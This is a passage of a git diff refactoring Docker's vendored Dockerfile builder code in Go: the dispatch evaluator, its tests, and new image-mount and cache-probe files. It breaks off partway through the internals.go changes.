-		command.Add:         add,
-		command.Arg:         arg,
-		command.Cmd:         cmd,
-		command.Copy:        dispatchCopy, // copy() is a go builtin
-		command.Entrypoint:  entrypoint,
-		command.Env:         env,
-		command.Expose:      expose,
-		command.From:        from,
-		command.Healthcheck: healthcheck,
-		command.Label:       label,
-		command.Maintainer:  maintainer,
-		command.Onbuild:     onbuild,
-		command.Run:         run,
-		command.Shell:       shell,
-		command.StopSignal:  stopSignal,
-		command.User:        user,
-		command.Volume:      volume,
-		command.Workdir:     workdir,
-	}
-}
-
-// This method is the entrypoint to all statement handling routines.
-//
-// Almost all nodes will have this structure:
-// Child[Node, Node, Node] where Child is from parser.Node.Children and each
-// node comes from parser.Node.Next. This forms a "line" with a statement and
-// arguments and we process them in this normalized form by hitting
-// evaluateTable with the leaf nodes of the command and the Builder object.
-//
-// ONBUILD is a special case; in this case the parser will emit:
-// Child[Node, Child[Node, Node...]] where the first node is the literal
-// "onbuild" and the child entrypoint is the command of the ONBUILD statement,
-// such as `RUN` in ONBUILD RUN foo. There is special case logic in here to
-// deal with that, at least until it becomes more of a general concern with new
-// features.
-func (b *Builder) dispatch(stepN int, stepTotal int, ast *parser.Node) error {
-	cmd := ast.Value
-	upperCasedCmd := strings.ToUpper(cmd)
-
-	// To ensure the user is given a decent error message if the platform
-	// on which the daemon is running does not support a builder command.
-	if err := platformSupports(strings.ToLower(cmd)); err != nil {
-		return err
-	}
-
-	attrs := ast.Attributes
-	original := ast.Original
-	flags := ast.Flags
-	strList := []string{}
-	msg := fmt.Sprintf("Step %d/%d : %s", stepN+1, stepTotal, upperCasedCmd)
-
-	if len(ast.Flags) > 0 {
-		msg += " " + strings.Join(ast.Flags, " ")
-	}
-
-	if cmd == "onbuild" {
-		if ast.Next == nil {
-			return fmt.Errorf("ONBUILD requires at least one argument")
+func dispatch(d dispatchRequest, cmd instructions.Command) (err error) {
+	if c, ok := cmd.(instructions.PlatformSpecific); ok {
+		err := c.CheckPlatform(d.state.operatingSystem)
+		if err != nil {
+			return errdefs.InvalidParameter(err)
 		}
-		ast = ast.Next.Children[0]
-		strList = append(strList, ast.Value)
-		msg += " " + ast.Value
-
-		if len(ast.Flags) > 0 {
-			msg += " " + strings.Join(ast.Flags, " ")
+	}
+	runConfigEnv := d.state.runConfig.Env
+	envs := append(runConfigEnv, d.state.buildArgs.FilterAllowed(runConfigEnv)...)
+
+	if ex, ok := cmd.(instructions.SupportsSingleWordExpansion); ok {
+		err := ex.Expand(func(word string) (string, error) {
+			return d.shlex.ProcessWord(word, envs)
+		})
+		if err != nil {
+			return errdefs.InvalidParameter(err)
 		}
-
 	}
 
-	// count the number of nodes that we are going to traverse first
-	// so we can pre-create the argument and message array. This speeds up the
-	// allocation of those list a lot when they have a lot of arguments
-	cursor := ast
-	var n int
-	for cursor.Next != nil {
-		cursor = cursor.Next
-		n++
-	}
-	msgList := make([]string, n)
-
-	var i int
-	// Append the build-time args to config-environment.
-	// This allows builder config to override the variables, making the behavior similar to
-	// a shell script i.e. `ENV foo bar` overrides value of `foo` passed in build
-	// context. But `ENV foo $foo` will use the value from build context if one
-	// isn't already been defined by a previous ENV primitive.
-	// Note, we get this behavior because we know that ProcessWord() will
-	// stop on the first occurrence of a variable name and not notice
-	// a subsequent one. So, putting the buildArgs list after the Config.Env
-	// list, in 'envs', is safe.
-	envs := b.runConfig.Env
-	for key, val := range b.options.BuildArgs {
-		if !b.isBuildArgAllowed(key) {
-			// skip build-args that are not in allowed list, meaning they have
-			// not been defined by an "ARG" Dockerfile command yet.
-			// This is an error condition but only if there is no "ARG" in the entire
-			// Dockerfile, so we'll generate any necessary errors after we parsed
-			// the entire file (see 'leftoverArgs' processing in evaluator.go )
-			continue
+	defer func() {
+		if d.builder.options.ForceRemove {
+			d.builder.containerManager.RemoveAll(d.builder.Stdout)
+			return
 		}
-		envs = append(envs, fmt.Sprintf("%s=%s", key, *val))
-	}
-	for ast.Next != nil {
-		ast = ast.Next
-		var str string
-		str = ast.Value
-		if replaceEnvAllowed[cmd] {
-			var err error
-			var words []string
-
-			if allowWordExpansion[cmd] {
-				words, err = ProcessWords(str, envs, b.directive.EscapeToken)
-				if err != nil {
-					return err
-				}
-				strList = append(strList, words...)
-			} else {
-				str, err = ProcessWord(str, envs, b.directive.EscapeToken)
-				if err != nil {
-					return err
-				}
-				strList = append(strList, str)
-			}
-		} else {
-			strList = append(strList, str)
+		if d.builder.options.Remove && err == nil {
+			d.builder.containerManager.RemoveAll(d.builder.Stdout)
+			return
 		}
-		msgList[i] = ast.Value
-		i++
+	}()
+	switch c := cmd.(type) {
+	case *instructions.EnvCommand:
+		return dispatchEnv(d, c)
+	case *instructions.MaintainerCommand:
+		return dispatchMaintainer(d, c)
+	case *instructions.LabelCommand:
+		return dispatchLabel(d, c)
+	case *instructions.AddCommand:
+		return dispatchAdd(d, c)
+	case *instructions.CopyCommand:
+		return dispatchCopy(d, c)
+	case *instructions.OnbuildCommand:
+		return dispatchOnbuild(d, c)
+	case *instructions.WorkdirCommand:
+		return dispatchWorkdir(d, c)
+	case *instructions.RunCommand:
+		return dispatchRun(d, c)
+	case *instructions.CmdCommand:
+		return dispatchCmd(d, c)
+	case *instructions.HealthCheckCommand:
+		return dispatchHealthcheck(d, c)
+	case *instructions.EntrypointCommand:
+		return dispatchEntrypoint(d, c)
+	case *instructions.ExposeCommand:
+		return dispatchExpose(d, c, envs)
+	case *instructions.UserCommand:
+		return dispatchUser(d, c)
+	case *instructions.VolumeCommand:
+		return dispatchVolume(d, c)
+	case *instructions.StopSignalCommand:
+		return dispatchStopSignal(d, c)
+	case *instructions.ArgCommand:
+		return dispatchArg(d, c)
+	case *instructions.ShellCommand:
+		return dispatchShell(d, c)
 	}
+	return errors.Errorf("unsupported command type: %v", reflect.TypeOf(cmd))
+}
 
-	msg += " " + strings.Join(msgList, " ")
-	fmt.Fprintln(b.Stdout, msg)
+// dispatchState is a data object which is modified by dispatchers
+type dispatchState struct {
+	runConfig       *container.Config
+	maintainer      string
+	cmdSet          bool
+	imageID         string
+	baseImage       builder.Image
+	stageName       string
+	buildArgs       *BuildArgs
+	operatingSystem string
+}
 
-	// XXX yes, we skip any cmds that are not valid; the parser should have
-	// picked these out already.
-	if f, ok := evaluateTable[cmd]; ok {
-		b.flags = NewBFlags()
-		b.flags.Args = flags
-		return f(b, strList, attrs, original)
+func newDispatchState(baseArgs *BuildArgs) *dispatchState {
+	args := baseArgs.Clone()
+	args.ResetAllowed()
+	return &dispatchState{runConfig: &container.Config{}, buildArgs: args}
+}
+
+type stagesBuildResults struct {
+	flat    []*container.Config
+	indexed map[string]*container.Config
+}
+
+func newStagesBuildResults() *stagesBuildResults {
+	return &stagesBuildResults{
+		indexed: make(map[string]*container.Config),
 	}
+}
 
-	return fmt.Errorf("Unknown instruction: %s", upperCasedCmd)
+func (r *stagesBuildResults) getByName(name string) (*container.Config, bool) {
+	c, ok := r.indexed[strings.ToLower(name)]
+	return c, ok
 }
 
-// checkDispatch does a simple check for syntax errors of the Dockerfile.
-// Because some of the instructions can only be validated through runtime,
-// arg, env, etc., this syntax check will not be complete and could not replace
-// the runtime check. Instead, this function is only a helper that allows
-// user to find out the obvious error in Dockerfile earlier on.
-// onbuild bool: indicate if instruction XXX is part of `ONBUILD XXX` trigger
-func (b *Builder) checkDispatch(ast *parser.Node, onbuild bool) error {
-	cmd := ast.Value
-	upperCasedCmd := strings.ToUpper(cmd)
+func (r *stagesBuildResults) validateIndex(i int) error {
+	if i == len(r.flat) {
+		return errors.New("refers to current build stage")
+	}
+	if i < 0 || i > len(r.flat) {
+		return errors.New("index out of bounds")
+	}
+	return nil
+}
 
-	// To ensure the user is given a decent error message if the platform
-	// on which the daemon is running does not support a builder command.
-	if err := platformSupports(strings.ToLower(cmd)); err != nil {
-		return err
+func (r *stagesBuildResults) get(nameOrIndex string) (*container.Config, error) {
+	if c, ok := r.getByName(nameOrIndex); ok {
+		return c, nil
 	}
+	ix, err := strconv.ParseInt(nameOrIndex, 10, 0)
+	if err != nil {
+		return nil, nil
+	}
+	if err := r.validateIndex(int(ix)); err != nil {
+		return nil, err
+	}
+	return r.flat[ix], nil
+}
 
-	// The instruction itself is ONBUILD, we will make sure it follows with at
-	// least one argument
-	if upperCasedCmd == "ONBUILD" {
-		if ast.Next == nil {
-			return fmt.Errorf("ONBUILD requires at least one argument")
+func (r *stagesBuildResults) checkStageNameAvailable(name string) error {
+	if name != "" {
+		if _, ok := r.getByName(name); ok {
+			return errors.Errorf("%s stage name already used", name)
 		}
 	}
+	return nil
+}
 
-	// The instruction is part of ONBUILD trigger (not the instruction itself)
-	if onbuild {
-		switch upperCasedCmd {
-		case "ONBUILD":
-			return fmt.Errorf("Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed")
-		case "MAINTAINER", "FROM":
-			return fmt.Errorf("%s isn't allowed as an ONBUILD trigger", upperCasedCmd)
+func (r *stagesBuildResults) commitStage(name string, config *container.Config) error {
+	if name != "" {
+		if _, ok := r.getByName(name); ok {
+			return errors.Errorf("%s stage name already used", name)
 		}
+		r.indexed[strings.ToLower(name)] = config
 	}
+	r.flat = append(r.flat, config)
+	return nil
+}
+
+func commitStage(state *dispatchState, stages *stagesBuildResults) error {
+	return stages.commitStage(state.stageName, state.runConfig)
+}
+
+type dispatchRequest struct {
+	state   *dispatchState
+	shlex   *shell.Lex
+	builder *Builder
+	source  builder.Source
+	stages  *stagesBuildResults
+}
+
+func newDispatchRequest(builder *Builder, escapeToken rune, source builder.Source, buildArgs *BuildArgs, stages *stagesBuildResults) dispatchRequest {
+	return dispatchRequest{
+		state:   newDispatchState(buildArgs),
+		shlex:   shell.NewLex(escapeToken),
+		builder: builder,
+		source:  source,
+		stages:  stages,
+	}
+}
+
+func (s *dispatchState) updateRunConfig() {
+	s.runConfig.Image = s.imageID
+}
+
+// hasFromImage returns true if the builder has processed a `FROM <image>` line
+func (s *dispatchState) hasFromImage() bool {
+	return s.imageID != "" || (s.baseImage != nil && s.baseImage.ImageID() == "")
+}
 
-	if _, ok := evaluateTable[cmd]; ok {
-		return nil
+func (s *dispatchState) beginStage(stageName string, image builder.Image) error {
+	s.stageName = stageName
+	s.imageID = image.ImageID()
+	s.operatingSystem = image.OperatingSystem()
+	if s.operatingSystem == "" { // In case it isn't set
+		s.operatingSystem = runtime.GOOS
+	}
+	if !system.IsOSSupported(s.operatingSystem) {
+		return system.ErrNotSupportedOperatingSystem
 	}
 
-	return fmt.Errorf("Unknown instruction: %s", upperCasedCmd)
+	if image.RunConfig() != nil {
+		// copy avoids referencing the same instance when 2 stages have the same base
+		s.runConfig = copyRunConfig(image.RunConfig())
+	} else {
+		s.runConfig = &container.Config{}
+	}
+	s.baseImage = image
+	s.setDefaultPath()
+	s.runConfig.OpenStdin = false
+	s.runConfig.StdinOnce = false
+	return nil
+}
+
+// Add the default PATH to runConfig.ENV if one exists for the operating system and there
+// is no PATH set. Note that Windows containers on Windows won't have one as it's set by HCS
+func (s *dispatchState) setDefaultPath() {
+	defaultPath := system.DefaultPathEnv(s.operatingSystem)
+	if defaultPath == "" {
+		return
+	}
+	envMap := opts.ConvertKVStringsToMap(s.runConfig.Env)
+	if _, ok := envMap["PATH"]; !ok {
+		s.runConfig.Env = append(s.runConfig.Env, "PATH="+defaultPath)
+	}
 }
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go
index 4340a2f8ac..fb79b238e8 100644
--- a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go
+++ b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go
@@ -1,21 +1,22 @@
-package dockerfile
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
 
 import (
-	"io/ioutil"
-	"strings"
+	"os"
 	"testing"
 
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/container"
-	"github.com/docker/docker/builder"
-	"github.com/docker/docker/builder/dockerfile/parser"
+	"github.com/docker/docker/builder/remotecontext"
 	"github.com/docker/docker/pkg/archive"
 	"github.com/docker/docker/pkg/reexec"
+	"github.com/moby/buildkit/frontend/dockerfile/instructions"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
 )
 
 type dispatchTestCase struct {
-	name, dockerfile, expectedError string
-	files                           map[string]string
+	name, expectedError string
+	cmd                 instructions.Command
+	files               map[string]string
 }
 
 func init() {
@@ -23,107 +24,72 @@ func init() {
 }
 
 func initDispatchTestCases() []dispatchTestCase {
-	dispatchTestCases := []dispatchTestCase{{
-		name: "copyEmptyWhitespace",
-		dockerfile: `COPY
-	quux \
-      bar`,
-		expectedError: "COPY requires at least two arguments",
-	},
-		{
-			name:          "ONBUILD forbidden FROM",
-			dockerfile:    "ONBUILD FROM scratch",
-			expectedError: "FROM isn't allowed as an ONBUILD trigger",
-			files:         nil,
-		},
-		{
-			name:          "ONBUILD forbidden MAINTAINER",
-			dockerfile:    "ONBUILD MAINTAINER docker.io",
-			expectedError: "MAINTAINER isn't allowed as an ONBUILD trigger",
-			files:         nil,
-		},
-		{
-			name:          "ARG two arguments",
-			dockerfile:    "ARG foo bar",
-			expectedError: "ARG requires exactly one argument",
-			files:         nil,
-		},
-		{
-			name:          "MAINTAINER unknown flag",
-			dockerfile:    "MAINTAINER --boo joe@example.com",
-			expectedError: "Unknown flag: boo",
-			files:         nil,
-		},
-		{
-			name:          "ADD multiple files to file",
-			dockerfile:    "ADD file1.txt file2.txt test",
-			expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /",
-			files:         map[string]string{"file1.txt": "test1", "file2.txt": "test2"},
-		},
-		{
-			name:          "JSON ADD multiple files to file",
-			dockerfile:    `ADD ["file1.txt", "file2.txt", "test"]`,
-			expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /",
-			files:         map[string]string{"file1.txt": "test1", "file2.txt": "test2"},
-		},
-		{
-			name:          "Wildcard ADD multiple files to file",
-			dockerfile:    "ADD file*.txt test",
+	dispatchTestCases := []dispatchTestCase{
+		{
+			name: "ADD multiple files to file",
+			cmd: &instructions.AddCommand{SourcesAndDest: instructions.SourcesAndDest{
+				"file1.txt",
+				"file2.txt",
+				"test",
+			}},
 			expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /",
 			files:         map[string]string{"file1.txt": "test1", "file2.txt": "test2"},
 		},
 		{
-			name:          "Wildcard JSON ADD multiple files to file",
-			dockerfile:    `ADD ["file*.txt", "test"]`,
+			name: "Wildcard ADD multiple files to file",
+			cmd: &instructions.AddCommand{SourcesAndDest: instructions.SourcesAndDest{
+				"file*.txt",
+				"test",
+			}},
 			expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /",
 			files:         map[string]string{"file1.txt": "test1", "file2.txt": "test2"},
 		},
 		{
-			name:          "COPY multiple files to file",
-			dockerfile:    "COPY file1.txt file2.txt test",
+			name: "COPY multiple files to file",
+			cmd: &instructions.CopyCommand{SourcesAndDest: instructions.SourcesAndDest{
+				"file1.txt",
+				"file2.txt",
+				"test",
+			}},
 			expectedError: "When using COPY with more than one source file, the destination must be a directory and end with a /",
 			files:         map[string]string{"file1.txt": "test1", "file2.txt": "test2"},
 		},
 		{
-			name:          "JSON COPY multiple files to file",
-			dockerfile:    `COPY ["file1.txt", "file2.txt", "test"]`,
-			expectedError: "When using COPY with more than one source file, the destination must be a directory and end with a /",
-			files:         map[string]string{"file1.txt": "test1", "file2.txt": "test2"},
-		},
-		{
-			name:          "ADD multiple files to file with whitespace",
-			dockerfile:    `ADD [ "test file1.txt", "test file2.txt", "test" ]`,
+			name: "ADD multiple files to file with whitespace",
+			cmd: &instructions.AddCommand{SourcesAndDest: instructions.SourcesAndDest{
+				"test file1.txt",
+				"test file2.txt",
+				"test",
+			}},
 			expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /",
 			files:         map[string]string{"test file1.txt": "test1", "test file2.txt": "test2"},
 		},
 		{
-			name:          "COPY multiple files to file with whitespace",
-			dockerfile:    `COPY [ "test file1.txt", "test file2.txt", "test" ]`,
+			name: "COPY multiple files to file with whitespace",
+			cmd: &instructions.CopyCommand{SourcesAndDest: instructions.SourcesAndDest{
+				"test file1.txt",
+				"test file2.txt",
+				"test",
+			}},
 			expectedError: "When using COPY with more than one source file, the destination must be a directory and end with a /",
 			files:         map[string]string{"test file1.txt": "test1", "test file2.txt": "test2"},
 		},
 		{
-			name:          "COPY wildcard no files",
-			dockerfile:    `COPY file*.txt /tmp/`,
-			expectedError: "No source files were specified",
+			name: "COPY wildcard no files",
+			cmd: &instructions.CopyCommand{SourcesAndDest: instructions.SourcesAndDest{
+				"file*.txt",
+				"/tmp/",
+			}},
+			expectedError: "COPY failed: no source files were specified",
 			files:         nil,
 		},
 		{
-			name:          "COPY url",
-			dockerfile:    `COPY https://index.docker.io/robots.txt /`,
-			expectedError: "Source can't be a URL for COPY",
-			files:         nil,
-		},
-		{
-			name:          "Chaining ONBUILD",
-			dockerfile:    `ONBUILD ONBUILD RUN touch foobar`,
-			expectedError: "Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed",
-			files:         nil,
-		},
-		{
-			name:          "Invalid instruction",
-			dockerfile:    `foo bar`,
-			expectedError: "Unknown instruction: FOO",
+			name: "COPY url",
+			cmd: &instructions.CopyCommand{SourcesAndDest: instructions.SourcesAndDest{
+				"https://index.docker.io/robots.txt",
+				"/",
+			}},
+			expectedError: "source can't be a URL for COPY",
 			files:         nil,
 		}}
 
@@ -131,6 +97,7 @@ func initDispatchTestCases() []dispatchTestCase {
 }
 
 func TestDispatch(t *testing.T) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	testCases := initDispatchTestCases()
 
 	for _, testCase := range testCases {
@@ -158,7 +125,7 @@ func executeTestCase(t *testing.T, testCase dispatchTestCase) {
 		}
 	}()
 
-	context, err := builder.MakeTarSumContext(tarStream)
+	context, err := remotecontext.FromArchive(tarStream)
 
 	if err != nil {
 		t.Fatalf("Error when creating tar context: %s", err)
@@ -170,28 +137,8 @@ func executeTestCase(t *testing.T, testCase dispatchTestCase) {
 		}
 	}()
 
-	r := strings.NewReader(testCase.dockerfile)
-	d := parser.Directive{}
-	parser.SetEscapeToken(parser.DefaultEscapeToken, &d)
-	n, err := parser.Parse(r, &d)
-
-	if err != nil {
-		t.Fatalf("Error when parsing Dockerfile: %s", err)
-	}
-
-	config := &container.Config{}
-	options := &types.ImageBuildOptions{}
-
-	b := &Builder{runConfig: config, options: options, Stdout: ioutil.Discard, context: context}
-
-	err = b.dispatch(0, len(n.Children), n.Children[0])
-
-	if err == nil {
-		t.Fatalf("No error when executing test %s", testCase.name)
-	}
-
-	if !strings.Contains(err.Error(), testCase.expectedError) {
-		t.Fatalf("Wrong error message. Should be \"%s\". Got \"%s\"", testCase.expectedError, err.Error())
-	}
-
+	b := newBuilderWithMockBackend()
+	sb := newDispatchRequest(b, '`', context, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
+	err = dispatch(sb, testCase.cmd)
+	assert.Check(t, is.ErrorContains(err, testCase.expectedError))
 }
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go
deleted file mode 100644
index 28fd5b156b..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go
+++ /dev/null
@@ -1,9 +0,0 @@
-// +build !windows
-
-package dockerfile
-
-// platformSupports is a short-term function to give users a quality error
-// message if a Dockerfile uses a command not supported on the platform.
-func platformSupports(command string) error {
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go
deleted file mode 100644
index 72483a2ec8..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go
+++ /dev/null
@@ -1,13 +0,0 @@
-package dockerfile
-
-import "fmt"
-
-// platformSupports is gives users a quality error message if a Dockerfile uses
-// a command not supported on the platform.
-func platformSupports(command string) error {
-	switch command {
-	case "stopsignal":
-		return fmt.Errorf("The daemon on this platform does not support the command '%s'", command)
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/imagecontext.go b/vendor/github.com/docker/docker/builder/dockerfile/imagecontext.go
new file mode 100644
index 0000000000..53a4b9774b
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/imagecontext.go
@@ -0,0 +1,121 @@
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
+
+import (
+	"context"
+	"runtime"
+
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/builder"
+	dockerimage "github.com/docker/docker/image"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+)
+
+type getAndMountFunc func(string, bool, string) (builder.Image, builder.ROLayer, error)
+
+// imageSources mounts images and provides a cache for mounted images. It tracks
+// all images so they can be unmounted at the end of the build.
+type imageSources struct {
+	byImageID map[string]*imageMount
+	mounts    []*imageMount
+	getImage  getAndMountFunc
+}
+
+func newImageSources(ctx context.Context, options builderOptions) *imageSources {
+	getAndMount := func(idOrRef string, localOnly bool, osForPull string) (builder.Image, builder.ROLayer, error) {
+		pullOption := backend.PullOptionNoPull
+		if !localOnly {
+			if options.Options.PullParent {
+				pullOption = backend.PullOptionForcePull
+			} else {
+				pullOption = backend.PullOptionPreferLocal
+			}
+		}
+		return options.Backend.GetImageAndReleasableLayer(ctx, idOrRef, backend.GetImageAndLayerOptions{
+			PullOption: pullOption,
+			AuthConfig: options.Options.AuthConfigs,
+			Output:     options.ProgressWriter.Output,
+			OS:         osForPull,
+		})
+	}
+
+	return &imageSources{
+		byImageID: make(map[string]*imageMount),
+		getImage:  getAndMount,
+	}
+}
+
+func (m *imageSources) Get(idOrRef string, localOnly bool, osForPull string) (*imageMount, error) {
+	if im, ok := m.byImageID[idOrRef]; ok {
+		return im, nil
+	}
+
+	image, layer, err := m.getImage(idOrRef, localOnly, osForPull)
+	if err != nil {
+		return nil, err
+	}
+	im := newImageMount(image, layer)
+	m.Add(im)
+	return im, nil
+}
+
+func (m *imageSources) Unmount() (retErr error) {
+	for _, im := range m.mounts {
+		if err := im.unmount(); err != nil {
+			logrus.Error(err)
+			retErr = err
+		}
+	}
+	return
+}
+
+func (m *imageSources) Add(im *imageMount) {
+	switch im.image {
+	case nil:
+		// set the OS for scratch images
+		os := runtime.GOOS
+		// Windows does not support scratch except for LCOW
+		if runtime.GOOS == "windows" {
+			os = "linux"
+		}
+		im.image = &dockerimage.Image{V1Image: dockerimage.V1Image{OS: os}}
+	default:
+		m.byImageID[im.image.ImageID()] = im
+	}
+	m.mounts = append(m.mounts, im)
+}
+
+// imageMount is a reference to an image that can be used as a builder.Source
+type imageMount struct {
+	image  builder.Image
+	source builder.Source
+	layer  builder.ROLayer
+}
+
+func newImageMount(image builder.Image, layer builder.ROLayer) *imageMount {
+	im := &imageMount{image: image, layer: layer}
+	return im
+}
+
+func (im *imageMount) unmount() error {
+	if im.layer == nil {
+		return nil
+	}
+	if err := im.layer.Release(); err != nil {
+		return errors.Wrapf(err, "failed to unmount previous build image %s", im.image.ImageID())
+	}
+	im.layer = nil
+	return nil
+}
+
+func (im *imageMount) Image() builder.Image {
+	return im.image
+}
+
+func (im *imageMount) NewRWLayer() (builder.RWLayer, error) {
+	return im.layer.NewRWLayer()
+}
+
+func (im *imageMount) ImageID() string {
+	return im.image.ImageID()
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/imageprobe.go b/vendor/github.com/docker/docker/builder/dockerfile/imageprobe.go
new file mode 100644
index 0000000000..6960bf8897
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/imageprobe.go
@@ -0,0 +1,63 @@
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
+
+import (
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/builder"
+	"github.com/sirupsen/logrus"
+)
+
+// ImageProber exposes an Image cache to the Builder. It supports resetting a
+// cache.
+type ImageProber interface {
+	Reset()
+	Probe(parentID string, runConfig *container.Config) (string, error)
+}
+
+type imageProber struct {
+	cache       builder.ImageCache
+	reset       func() builder.ImageCache
+	cacheBusted bool
+}
+
+func newImageProber(cacheBuilder builder.ImageCacheBuilder, cacheFrom []string, noCache bool) ImageProber {
+	if noCache {
+		return &nopProber{}
+	}
+
+	reset := func() builder.ImageCache {
+		return cacheBuilder.MakeImageCache(cacheFrom)
+	}
+	return &imageProber{cache: reset(), reset: reset}
+}
+
+func (c *imageProber) Reset() {
+	c.cache = c.reset()
+	c.cacheBusted = false
+}
+
+// Probe checks if cache match can be found for current build instruction.
+// It returns the cachedID if there is a hit, and the empty string on miss
+func (c *imageProber) Probe(parentID string, runConfig *container.Config) (string, error) {
+	if c.cacheBusted {
+		return "", nil
+	}
+	cacheID, err := c.cache.GetCache(parentID, runConfig)
+	if err != nil {
+		return "", err
+	}
+	if len(cacheID) == 0 {
+		logrus.Debugf("[BUILDER] Cache miss: %s", runConfig.Cmd)
+		c.cacheBusted = true
+		return "", nil
+	}
+	logrus.Debugf("[BUILDER] Use cached version: %s", runConfig.Cmd)
+	return cacheID, nil
+}
+
+type nopProber struct{}
+
+func (c *nopProber) Reset() {}
+
+func (c *nopProber) Probe(_ string, _ *container.Config) (string, error) {
+	return "", nil
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals.go b/vendor/github.com/docker/docker/builder/dockerfile/internals.go
index 6f0a367842..88e75a2179 100644
--- a/vendor/github.com/docker/docker/builder/dockerfile/internals.go
+++ b/vendor/github.com/docker/docker/builder/dockerfile/internals.go
@@ -1,4 +1,4 @@
-package dockerfile
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
 
 // internals for handling commands. Covers many areas and a lot of
 // non-contiguous functionality. Please read the comments.
@@ -6,664 +6,476 @@ package dockerfile
 import (
 	"crypto/sha256"
 	"encoding/hex"
-	"errors"
 	"fmt"
 	"io"
-	"io/ioutil"
-	"net/http"
-	"net/url"
 	"os"
+	"path"
 	"path/filepath"
-	"sort"
+	"runtime"
 	"strings"
-	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/backend"
 	"github.com/docker/docker/api/types/container"
-	"github.com/docker/docker/api/types/strslice"
 	"github.com/docker/docker/builder"
-	"github.com/docker/docker/builder/dockerfile/parser"
+	"github.com/docker/docker/image"
 	"github.com/docker/docker/pkg/archive"
-	"github.com/docker/docker/pkg/httputils"
-	"github.com/docker/docker/pkg/ioutils"
-	"github.com/docker/docker/pkg/jsonmessage"
-	"github.com/docker/docker/pkg/progress"
-	"github.com/docker/docker/pkg/streamformatter"
+	"github.com/docker/docker/pkg/chrootarchive"
+	"github.com/docker/docker/pkg/containerfs"
+	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/stringid"
 	"github.com/docker/docker/pkg/system"
-	"github.com/docker/docker/pkg/tarsum"
-	"github.com/docker/docker/pkg/urlutil"
-	"github.com/docker/docker/runconfig/opts"
+	"github.com/docker/go-connections/nat"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
-func (b *Builder) commit(id string, autoCmd strslice.StrSlice, comment string) error {
-	if b.disableCommit {
-		return nil
-	}
-	if b.image == "" && !b.noBaseImage {
-		return fmt.Errorf("Please provide a source image with `from` prior to commit")
-	}
-	b.runConfig.Image = b.image
-
-	if id == "" {
-		cmd := b.runConfig.Cmd
-		b.runConfig.Cmd = strslice.StrSlice(append(getShell(b.runConfig), "#(nop) ", comment))
-		defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd)
-
-		hit, err := b.probeCache()
-		if err != nil {
-			return err
-		} else if hit {
-			return nil
-		}
-		id, err = b.create()
-		if err != nil {
-			return err
-		}
-	}
-
-	// Note: Actually copy the struct
-	autoConfig := *b.runConfig
-	autoConfig.Cmd = autoCmd
-
-	commitCfg := &backend.ContainerCommitConfig{
-		ContainerCommitConfig: types.ContainerCommitConfig{
-			Author: b.maintainer,
-			Pause:  true,
-			Config: &autoConfig,
-		},
-	}
-
-	// Commit the container
-	imageID, err := b.docker.Commit(id, commitCfg)
-	if err != nil {
-		return err
-	}
-
-	b.image = imageID
-	return nil
+// Archiver defines an interface for copying files from one destination to
+// another using Tar/Untar.
+type Archiver interface {
+	TarUntar(src, dst string) error
+	UntarPath(src, dst string) error
+	CopyWithTar(src, dst string) error
+	CopyFileWithTar(src, dst string) error
+	IDMappings() *idtools.IDMappings
 }
 
-type copyInfo struct {
-	builder.FileInfo
-	decompress bool
+// The builder will use the following interfaces if the container fs implements
+// these for optimized copies to and from the container.
+type extractor interface {
+	ExtractArchive(src io.Reader, dst string, opts *archive.TarOptions) error
 }
 
-func (b *Builder) runContextCommand(args []string, allowRemote bool, allowLocalDecompression bool, cmdName string) error {
-	if b.context == nil {
-		return fmt.Errorf("No context given. Impossible to use %s", cmdName)
-	}
-
-	if len(args) < 2 {
-		return fmt.Errorf("Invalid %s format - at least two arguments required", cmdName)
-	}
-
-	// Work in daemon-specific filepath semantics
-	dest := filepath.FromSlash(args[len(args)-1]) // last one is always the dest
-
-	b.runConfig.Image = b.image
-
-	var infos []copyInfo
-
-	// Loop through each src file and calculate the info we need to
-	// do the copy (e.g. hash value if cached).  Don't actually do
-	// the copy until we've looked at all src files
-	var err error
-	for _, orig := range args[0 : len(args)-1] {
-		var fi builder.FileInfo
-		decompress := allowLocalDecompression
-		if urlutil.IsURL(orig) {
-			if !allowRemote {
-				return fmt.Errorf("Source can't be a URL for %s", cmdName)
-			}
-			fi, err = b.download(orig)
